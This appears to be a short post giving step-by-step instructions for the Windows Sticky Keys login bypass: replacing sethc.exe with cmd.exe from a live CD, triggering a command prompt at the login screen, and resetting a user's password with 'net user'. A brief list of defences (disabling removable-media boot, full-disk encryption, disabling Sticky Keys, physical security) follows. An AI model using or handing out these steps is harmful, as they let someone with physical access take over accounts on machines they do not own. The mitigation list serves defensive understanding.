Steps to use the exploit
- Boot using any live cd to access the hard drive
- Replace C:\Windows\System32\sethc.exe with C:\Windows\System32\cmd.exe
- Reboot
- On Login Screen hit Shift key 5 times
- net user “username” “newpassword” [without quotes]
- Voila!
To secure your system from this venerability, these steps could slow down / stop the attacker.
- Disable booting using removable media using UEFI / BIOS & protect with password
- Full System Encryption
- Disable Sticky Keys
- Physical Security for the hardware